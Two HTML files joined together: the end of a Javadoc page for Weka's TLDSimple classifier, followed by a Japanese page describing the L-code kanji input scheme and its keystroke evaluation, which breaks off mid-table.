<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#numRunsTipText()">numRunsTipText</A></B>()</CODE>
<BR>
Returns the tip text for this property</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#setNumRuns(int)">setNumRuns</A></B>(int numRuns)</CODE>
<BR>
Sets the number of runs to perform.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#setOptions(java.lang.String[])">setOptions</A></B>(java.lang.String[] options)</CODE>
<BR>
Parses a given list of options.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#setUsingCutOff(boolean)">setUsingCutOff</A></B>(boolean cutOff)</CODE>
<BR>
Sets whether to use an empirical cutoff.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#toString()">toString</A></B>()</CODE>
<BR>
Gets a string describing the classifier.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#usingCutOffTipText()">usingCutOffTipText</A></B>()</CODE>
<BR>
Returns the tip text for this property</TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_weka.classifiers.RandomizableClassifier"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left"><B>Methods inherited from class weka.classifiers.<A HREF="../../../weka/classifiers/RandomizableClassifier.html" title="class in weka.classifiers">RandomizableClassifier</A></B></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE><A HREF="../../../weka/classifiers/RandomizableClassifier.html#getSeed()">getSeed</A>, <A HREF="../../../weka/classifiers/RandomizableClassifier.html#seedTipText()">seedTipText</A>, <A HREF="../../../weka/classifiers/RandomizableClassifier.html#setSeed(int)">setSeed</A></CODE></TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_weka.classifiers.Classifier"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left"><B>Methods inherited from class weka.classifiers.<A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">Classifier</A></B></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE><A HREF="../../../weka/classifiers/Classifier.html#debugTipText()">debugTipText</A>, <A HREF="../../../weka/classifiers/Classifier.html#forName(java.lang.String, java.lang.String[])">forName</A>, <A HREF="../../../weka/classifiers/Classifier.html#getDebug()">getDebug</A>, <A HREF="../../../weka/classifiers/Classifier.html#makeCopies(weka.classifiers.Classifier, int)">makeCopies</A>, <A HREF="../../../weka/classifiers/Classifier.html#makeCopy(weka.classifiers.Classifier)">makeCopy</A>, <A HREF="../../../weka/classifiers/Classifier.html#setDebug(boolean)">setDebug</A></CODE></TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TH ALIGN="left"><B>Methods inherited from class java.lang.Object</B></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE>equals, getClass, hashCode, notify, notifyAll, wait, wait, wait</CODE></TD>
</TR>
</TABLE>
<P>
<!-- ============ FIELD DETAIL =========== -->
<A NAME="field_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Field Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="ZERO"><!-- --></A><H3>
ZERO</H3>
<PRE>
public static double <B>ZERO</B></PRE>
<DL>
<DD>The very small number representing zero
<P>
<DL>
</DL>
</DL>
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<A NAME="constructor_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Constructor Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="TLDSimple()"><!-- --></A><H3>
TLDSimple</H3>
<PRE>
public <B>TLDSimple</B>()</PRE>
<DL>
</DL>
<!-- ============ METHOD DETAIL ========== -->
<A NAME="method_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Method Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="globalInfo()"><!-- --></A><H3>
globalInfo</H3>
<PRE>
public java.lang.String <B>globalInfo</B>()</PRE>
<DL>
<DD>Returns a string describing this filter
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>a description of the filter suitable for
displaying in the explorer/experimenter gui</DL>
</DD>
</DL>
<HR>
<A NAME="getTechnicalInformation()"><!-- --></A><H3>
getTechnicalInformation</H3>
<PRE>
public <A HREF="../../../weka/core/TechnicalInformation.html" title="class in weka.core">TechnicalInformation</A> <B>getTechnicalInformation</B>()</PRE>
<DL>
<DD>Returns an instance of a TechnicalInformation object, containing
detailed information about the technical background of this class,
e.g., paper reference or book this class is based on.
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/core/TechnicalInformationHandler.html#getTechnicalInformation()">getTechnicalInformation</A></CODE> in interface <CODE><A HREF="../../../weka/core/TechnicalInformationHandler.html" title="interface in weka.core">TechnicalInformationHandler</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>the technical information about this class</DL>
</DD>
</DL>
<HR>
<A NAME="getCapabilities()"><!-- --></A><H3>
getCapabilities</H3>
<PRE>
public <A HREF="../../../weka/core/Capabilities.html" title="class in weka.core">Capabilities</A> <B>getCapabilities</B>()</PRE>
<DL>
<DD>Returns default capabilities of the classifier.
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/core/CapabilitiesHandler.html#getCapabilities()">getCapabilities</A></CODE> in interface <CODE><A HREF="../../../weka/core/CapabilitiesHandler.html" title="interface in weka.core">CapabilitiesHandler</A></CODE><DT><B>Overrides:</B><DD><CODE><A HREF="../../../weka/classifiers/Classifier.html#getCapabilities()">getCapabilities</A></CODE> in class <CODE><A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">Classifier</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>the capabilities of this classifier<DT><B>See Also:</B><DD><A HREF="../../../weka/core/Capabilities.html" title="class in weka.core"><CODE>Capabilities</CODE></A></DL>
</DD>
</DL>
<HR>
<A NAME="getMultiInstanceCapabilities()"><!-- --></A><H3>
getMultiInstanceCapabilities</H3>
<PRE>
public <A HREF="../../../weka/core/Capabilities.html" title="class in weka.core">Capabilities</A> <B>getMultiInstanceCapabilities</B>()</PRE>
<DL>
<DD>Returns the capabilities of this multi-instance classifier for the
relational data.
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/core/MultiInstanceCapabilitiesHandler.html#getMultiInstanceCapabilities()">getMultiInstanceCapabilities</A></CODE> in interface <CODE><A HREF="../../../weka/core/MultiInstanceCapabilitiesHandler.html" title="interface in weka.core">MultiInstanceCapabilitiesHandler</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>the capabilities of this object<DT><B>See Also:</B><DD><A HREF="../../../weka/core/Capabilities.html" title="class in weka.core"><CODE>Capabilities</CODE></A></DL>
</DD>
</DL>
<HR>
<A NAME="buildClassifier(weka.core.Instances)"><!-- --></A><H3>
buildClassifier</H3>
<PRE>
public void <B>buildClassifier</B>(<A HREF="../../../weka/core/Instances.html" title="class in weka.core">Instances</A> exs)
throws java.lang.Exception</PRE>
<DL>
<DD><B>Description copied from class: <CODE><A HREF="../../../weka/classifiers/Classifier.html#buildClassifier(weka.core.Instances)">Classifier</A></CODE></B></DD>
<DD>Generates a classifier. Must initialize all fields of the classifier
that are not being set via options (ie. multiple calls of buildClassifier
must always lead to the same result). Must not change the dataset
in any way.
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/classifiers/Classifier.html#buildClassifier(weka.core.Instances)">buildClassifier</A></CODE> in class <CODE><A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">Classifier</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>exs</CODE> - the training exemplars
<DT><B>Throws:</B>
<DD><CODE>java.lang.Exception</CODE> - if the model cannot be built properly</DL>
</DD>
</DL>
<HR>
<A NAME="classifyInstance(weka.core.Instance)"><!-- --></A><H3>
classifyInstance</H3>
<PRE>
public double <B>classifyInstance</B>(<A HREF="../../../weka/core/Instance.html" title="class in weka.core">Instance</A> ex)
throws java.lang.Exception</PRE>
<DL>
<DD><B>Description copied from class: <CODE><A HREF="../../../weka/classifiers/Classifier.html#classifyInstance(weka.core.Instance)">Classifier</A></CODE></B></DD>
<DD>Classifies the given test instance. The instance has to belong to a
dataset when it's being classified. Note that a classifier MUST
implement either this or distributionForInstance().
<P>
<DD><DL>
<DT><B>Overrides:</B><DD><CODE><A HREF="../../../weka/classifiers/Classifier.html#classifyInstance(weka.core.Instance)">classifyInstance</A></CODE> in class <CODE><A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">Classifier</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>ex</CODE> - the given test exemplar
<DT><B>Returns:</B><DD>the classification
<DT><B>Throws:</B>
<DD><CODE>java.lang.Exception</CODE> - if the exemplar could not be classified
successfully</DL>
</DD>
</DL>
<HR>
<A NAME="distributionForInstance(weka.core.Instance)"><!-- --></A><H3>
distributionForInstance</H3>
<PRE>
public double[] <B>distributionForInstance</B>(<A HREF="../../../weka/core/Instance.html" title="class in weka.core">Instance</A> ex)
throws java.lang.Exception</PRE>
<DL>
<DD>Computes the distribution for a given exemplar
<P>
<DD><DL>
<DT><B>Overrides:</B><DD><CODE><A HREF="../../../weka/classifiers/Classifier.html#distributionForInstance(weka.core.Instance)">distributionForInstance</A></CODE> in class <CODE><A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">Classifier</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>ex</CODE> - the exemplar for which distribution is computed
<DT><B>Returns:</B><DD>the distribution
<DT><B>Throws:</B>
<DD><CODE>java.lang.Exception</CODE> - if the distribution can't be computed successfully</DL>
</DD>
</DL>
<HR>
<A NAME="listOptions()"><!-- --></A><H3>
listOptions</H3>
<PRE>
public java.util.Enumeration <B>listOptions</B>()</PRE>
<DL>
<DD>Returns an enumeration describing the available options
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/core/OptionHandler.html#listOptions()">listOptions</A></CODE> in interface <CODE><A HREF="../../../weka/core/OptionHandler.html" title="interface in weka.core">OptionHandler</A></CODE><DT><B>Overrides:</B><DD><CODE><A HREF="../../../weka/classifiers/RandomizableClassifier.html#listOptions()">listOptions</A></CODE> in class <CODE><A HREF="../../../weka/classifiers/RandomizableClassifier.html" title="class in weka.classifiers">RandomizableClassifier</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>an enumeration of all the available options</DL>
</DD>
</DL>
<HR>
<A NAME="setOptions(java.lang.String[])"><!-- --></A><H3>
setOptions</H3>
<PRE>
public void <B>setOptions</B>(java.lang.String[] options)
throws java.lang.Exception</PRE>
<DL>
<DD>Parses a given list of options. <p/>
<!-- options-start -->
Valid options are: <p/>
<pre> -C
Set whether or not use empirical
log-odds cut-off instead of 0</pre>
<pre> -R <numOfRuns>
Set the number of multiple runs
needed for searching the MLE.</pre>
<pre> -S <num>
Random number seed.
(default 1)</pre>
<pre> -D
If set, classifier is run in debug mode and
may output additional info to the console</pre>
<!-- options-end -->
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/core/OptionHandler.html#setOptions(java.lang.String[])">setOptions</A></CODE> in interface <CODE><A HREF="../../../weka/core/OptionHandler.html" title="interface in weka.core">OptionHandler</A></CODE><DT><B>Overrides:</B><DD><CODE><A HREF="../../../weka/classifiers/RandomizableClassifier.html#setOptions(java.lang.String[])">setOptions</A></CODE> in class <CODE><A HREF="../../../weka/classifiers/RandomizableClassifier.html" title="class in weka.classifiers">RandomizableClassifier</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>options</CODE> - the list of options as an array of strings
<DT><B>Throws:</B>
<DD><CODE>java.lang.Exception</CODE> - if an option is not supported</DL>
</DD>
</DL>
<HR>
<A NAME="getOptions()"><!-- --></A><H3>
getOptions</H3>
<PRE>
public java.lang.String[] <B>getOptions</B>()</PRE>
<DL>
<DD>Gets the current settings of the Classifier.
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/core/OptionHandler.html#getOptions()">getOptions</A></CODE> in interface <CODE><A HREF="../../../weka/core/OptionHandler.html" title="interface in weka.core">OptionHandler</A></CODE><DT><B>Overrides:</B><DD><CODE><A HREF="../../../weka/classifiers/RandomizableClassifier.html#getOptions()">getOptions</A></CODE> in class <CODE><A HREF="../../../weka/classifiers/RandomizableClassifier.html" title="class in weka.classifiers">RandomizableClassifier</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>an array of strings suitable for passing to setOptions</DL>
</DD>
</DL>
<HR>
<A NAME="numRunsTipText()"><!-- --></A><H3>
numRunsTipText</H3>
<PRE>
public java.lang.String <B>numRunsTipText</B>()</PRE>
<DL>
<DD>Returns the tip text for this property
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>tip text for this property suitable for
displaying in the explorer/experimenter gui</DL>
</DD>
</DL>
<HR>
<A NAME="setNumRuns(int)"><!-- --></A><H3>
setNumRuns</H3>
<PRE>
public void <B>setNumRuns</B>(int numRuns)</PRE>
<DL>
<DD>Sets the number of runs to perform.
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>numRuns</CODE> - the number of runs to perform</DL>
</DD>
</DL>
<HR>
<A NAME="getNumRuns()"><!-- --></A><H3>
getNumRuns</H3>
<PRE>
public int <B>getNumRuns</B>()</PRE>
<DL>
<DD>Returns the number of runs to perform.
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>the number of runs to perform</DL>
</DD>
</DL>
<HR>
<A NAME="usingCutOffTipText()"><!-- --></A><H3>
usingCutOffTipText</H3>
<PRE>
public java.lang.String <B>usingCutOffTipText</B>()</PRE>
<DL>
<DD>Returns the tip text for this property
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>tip text for this property suitable for
displaying in the explorer/experimenter gui</DL>
</DD>
</DL>
<HR>
<A NAME="setUsingCutOff(boolean)"><!-- --></A><H3>
setUsingCutOff</H3>
<PRE>
public void <B>setUsingCutOff</B>(boolean cutOff)</PRE>
<DL>
<DD>Sets whether to use an empirical cutoff.
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>cutOff</CODE> - whether to use an empirical cutoff</DL>
</DD>
</DL>
<HR>
<A NAME="getUsingCutOff()"><!-- --></A><H3>
getUsingCutOff</H3>
<PRE>
public boolean <B>getUsingCutOff</B>()</PRE>
<DL>
<DD>Returns whether an empirical cutoff is used
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>true if an empirical cutoff is used</DL>
</DD>
</DL>
<HR>
<A NAME="toString()"><!-- --></A><H3>
toString</H3>
<PRE>
public java.lang.String <B>toString</B>()</PRE>
<DL>
<DD>Gets a string describing the classifier.
<P>
<DD><DL>
<DT><B>Overrides:</B><DD><CODE>toString</CODE> in class <CODE>java.lang.Object</CODE></DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>a string describing the classifer built.</DL>
</DD>
</DL>
<HR>
<A NAME="getRevision()"><!-- --></A><H3>
getRevision</H3>
<PRE>
public java.lang.String <B>getRevision</B>()</PRE>
<DL>
<DD>Returns the revision string.
<P>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../weka/core/RevisionHandler.html#getRevision()">getRevision</A></CODE> in interface <CODE><A HREF="../../../weka/core/RevisionHandler.html" title="interface in weka.core">RevisionHandler</A></CODE><DT><B>Overrides:</B><DD><CODE><A HREF="../../../weka/classifiers/Classifier.html#getRevision()">getRevision</A></CODE> in class <CODE><A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">Classifier</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Returns:</B><DD>the revision</DL>
</DD>
</DL>
<HR>
<A NAME="main(java.lang.String[])"><!-- --></A><H3>
main</H3>
<PRE>
public static void <B>main</B>(java.lang.String[] args)</PRE>
<DL>
<DD>Main method for testing.
<P>
<DD><DL>
</DL>
</DD>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>args</CODE> - the options for the classifier</DL>
</DD>
</DL>
<!-- ========= END OF CLASS DATA ========= -->
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="http://www.cs.waikato.ac.nz/ml/weka/" target="_blank"><FONT CLASS="NavBarFont1"><B>Weka's home</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../weka/classifiers/mi/TLD.html" title="class in weka.classifiers.mi"><B>PREV CLASS</B></A>
NEXT CLASS</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../index.html?weka/classifiers/mi/TLDSimple.html" target="_top"><B>FRAMES</B></A>
<A HREF="TLDSimple.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | <A HREF="#field_summary">FIELD</A> | <A HREF="#constructor_summary">CONSTR</A> | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: <A HREF="#field_detail">FIELD</A> | <A HREF="#constructor_detail">CONSTR</A> | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
</BODY>
</HTML>
|
l.html | miau/eljs | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang="ja">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Style-Type" content="text/css">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<meta name="author" content="YUSE Yosihiro">
<meta name="description" content="L-code">
<meta name="keywords" content="L-code,L-code(short code),F131215,漢直">
<title>L-code</title>
<link rel="stylesheet" href="css/tift.css" charset="UTF-8">
<link rel="stylesheet" href="css/eljs.css" charset="UTF-8">
<link rel="shortcut icon" href="img/tift.ico" type="image/vnd.microsoft.icon">
<link rel="icon" href="img/tift.png" type="image/png">
<!-- ============================================================= -->
<style type="text/css">
<!--
table.evaluation {
border: solid 1px Black;
caption-side: bottom;
}
table.evaluation th {
background-color: #e0e8ff;
}
table.evaluation td {
font-family: monospace;
padding-left: .5em;
padding-right: .5em;
}
-->
</style>
</head>
<!-- ============================================================= -->
<body>
<div class="container">
<h1><a name="top" href="#top">L-code</a></h1>
<p>
L-code は、ローマ字入力を漢字入力にまで拡張するコード体系で、
F131215 はその最終バージョン (2013 年 12 月 15 日版) です。
</p>
<p>
既に QWERTY ローマ字入力を身につけている、一般的な PC ユーザのための
漢直として、漢直Win などのような仮想鍵盤が利用できる環境を想定し、
漢字のコードを覚えていなくても入力できることを目標に設計しました。
</p>
<!-- ============================================================= -->
<h2><a name="sec_idea" href="#sec_idea">アイデア</a></h2>
<p>
<img src="img/vkbd.png" alt="実際の L-code での入力風景"
title="実際の L-code での入力風景"
width="360" height="240" style="float: right; margin: 0px 0px 8px 8px;">
L-code の基本的なアイデアを具体例で説明します。
右図のスクリーンショットは、実際の L-code での入力風景です。
『……漢字直接入力……』の『力』を入力しようとしている場面で、
『力 (りょく)』の読みの“頭文字”である『r』を打鍵した直後の
仮想鍵盤を表しています。
</p>
<p>
『らりるれろ』に交じって、「ら行」の音の読みの漢字が並んでいる
様子が見て取れますが、この中で『力』は『h』の位置にあるので、
結局『力』のコードは『rh』ということが分かります。
</p>
<p>
『らりるれろ』に交じって、「ら行」の音の読みの漢字が並んでいる
様子が見て取れますが、この中で『力』は『h』の位置にあるので、
結局『力』のコードは『rh』ということが分かります。
</p>
<p>
仮想鍵盤に収まりきらないその他の「ら行」の漢字は、
『l』(小文字の L) で仮想鍵盤を“シフト”することで入力します。
たとえば、『輪 (りん)』は『rlh』で、『恋 (れん)』は『rllh』というように。
</p>
<p>
つまり、 L-code で漢字を入力する手順は、
</p>
<ol>
<li> 漢字の読みの頭文字を打鍵する (1 打鍵)。
この時点で仮想鍵盤の第 0 面が表示される。
<li> (目的の漢字が仮想鍵盤の第 n 面にあるとして) n 回シフトする (n 打鍵)
<li> 第 n 面仮想鍵盤から目的の漢字を選ぶ (1 打鍵)
</ol>
<p>
となります。
</p>
<p>
合計 (n + 2) 打鍵で 1 文字を入力することになります (n ≧ 0) が、
この過程で、特に必要となるのは、
目的の漢字の読みの知識と、仮想鍵盤から漢字を探し出す作業だけです。
</p>
<p>
(無連想式の場合のように、無味乾燥なコードをひたすら覚える労力や、
「第一打鍵はあのキーだったかな…、それともこのキーだったかな…」
と当てずっぽうに試し打つ作業は、必要ないということです)
</p>
<h2><a name="sec_design" href="#sec_design">デザイン</a></h2>
<p>
L-code の基本的なアイデアは以上のとおりですが、
実用化には、もう少し詳細を詰める必要があります。
</p>
<h3><a name="subsec_initial_of_a_column" href="#subsec_initial_of_a_column">「あ行」の頭文字</a></h3>
<p>
「あ行」の音の漢字については、『w』を頭文字と定義しました
(音がよく似ていて、漢字数の少ない「わ行」と統合する)。
</p>
<h3><a name="subsec_initial_string" href="#subsec_initial_string">“頭文字列”の導入</a></h3>
<p>
「か・さ・た・は行」の音の漢字は数が多いため、シフト回数が増加しがちです。
1 文字あたりの総打鍵数を抑えるため、以下のように、
頭文字を“頭文字列”に拡張して、漢字を分散させることにしました。
</p>
<ul>
<li> 音が「きゃ行」などのように、『ゃ・ゅ・ょ』を伴う行は、『ky』のように
頭文字に『y』を添える。
<br>
(例: 『京 (きょう)』『局 (きょく)』……)
<li> 音が 2 文字で『ん』で終わるパターンは、『kn』のように『n』を添える。
<br>
(例: 『間 (かん)』『見 (けん)』……)
<li> 音が 2 文字で「子音 + 二重母音」のパターンは、『kw』のように『w』を添える。
<br>
(例: 『会 (かい)』『行 (こう)』……)
<li> 上記の規則は「か・さ・た・は行」にだけ適用する。
<br>
(「濁音行を持つ行、の清音行」だけ)
</ul>
<h3><a name="subsec_optimization" href="#subsec_optimization">(ある程度の) 最適化</a></h3>
<p>
コードを割り当てる際、各漢字に対して頭文字列は一意に決定しますが、
シフト回数と最終打鍵 (仮想鍵盤上の位置) は自由が効きます。
そこで、この部分には、その漢字の頻度順位を反映させるようにします。
すなわち、使用頻度の高い漢字ほどシフト回数が少なくなるように、
また打ち易いキーを使うように決めました。
</p>
<h3><a name="subsec_short_code" href="#subsec_short_code">短縮コード (short code)</a></h3>
<p>
以上の方針のもとで、実際にコードの割り当てを行ったところ、
学習漢字 (1006 字) については 2 〜 5 打鍵の範囲に収まりましたが、
常用漢字 (2136 字) については最長 9 打鍵となりました
(『股 (klllllllf)』『毀 (kllllllld)』『錮 (kllllllls)』の 3 字)。
<br>
この文章でもよく使っている語「打鍵」「鍵盤」の『鍵』を取ってみても、
そのコードは『knlllz』と 6 打鍵で、頻度の割に入力に手間がかかります。
</p>
<p>
そこで、コード中のシフト操作に相当する『l+』というパターンの部分を、
その長さの数字で置き換えた“短縮コード”を定義します。
『knlllz』 → 『kn3z』というように。
<br>
この短縮コードにより、漢字 1 字あたりのコード長は 2 〜 4 打鍵になります。
</p>
<p>
(ただし、この短縮コードは、 L-code の当初の目標とは相いれない、
“覚えていなくては入力できないコード”です。
<br>
したがって L-code の実装では標準コードと短縮コードの両方を受けつけるようにし、
普段は標準コードで入力するが、省力化したい場合に短縮コードも使用できる、
というようにするのが望ましいでしょう)
</p>
<h2><a name="sec_evaluation" href="#sec_evaluation">評価</a></h2>
<p>
L-code の漢直としての評価について、簡単に記しておきます。
ここでは 2 種類の例文を用意して打鍵数を計算し、他の漢直と比較しました。
</p>
<h3><a name="subsec_easy_text" href="#subsec_easy_text">学習漢字の範囲の、漢字含有率が低い平易な文章</a></h3>
<p>
小学校の国語の教科書掲載作品の、
原民喜『たん生日』(原文 1042 文字、漢字含有率 21.11%) の場合
</p>
<table class="evaluation">
<tbody>
<tr><th>TT-Code </th><td>2102 打鍵、 2.017 打鍵/文字</td></tr>
<tr><th>TUT-Code </th><td>2228 打鍵、 2.138 打鍵/文字</td></tr>
<tr><th>L-code (標準コード)</th><td>2044 打鍵、 1.962 打鍵/文字</td></tr>
<tr><th>L-code (短縮コード)</th><td>2021 打鍵、 1.940 打鍵/文字</td></tr>
<tr><th>[参考] ローマ字 </th><td>2031 打鍵 </td></tr>
</tbody>
</table>
<p>
打鍵数だけを見ると L-code が TT-Code や TUT-Code よりも少なくなりました。
L-code は、平易な文章を入力する場合に有効であると言えそうです。
</p>
<h3><a name="subsec_easy_text" href="#subsec_easy_text">常用漢字の範囲の、漢字含有率が高めで漢語の多い文章
</a></h3>
<p>
『日本国憲法前文』(原文 643 文字、漢字含有率 40.59%) の場合
</p>
<table class="evaluation">
<tbody>
<tr><th>TT-Code </th><td>1328 打鍵、 2.065 打鍵/文字</td></tr>
<tr><th>TUT-Code </th><td>1362 打鍵、 2.118 打鍵/文字</td></tr>
